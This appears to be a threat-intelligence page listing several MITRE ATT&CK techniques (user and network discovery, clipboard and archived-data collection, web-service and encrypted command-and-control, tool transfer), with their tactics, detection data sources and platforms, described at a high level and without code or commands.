Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre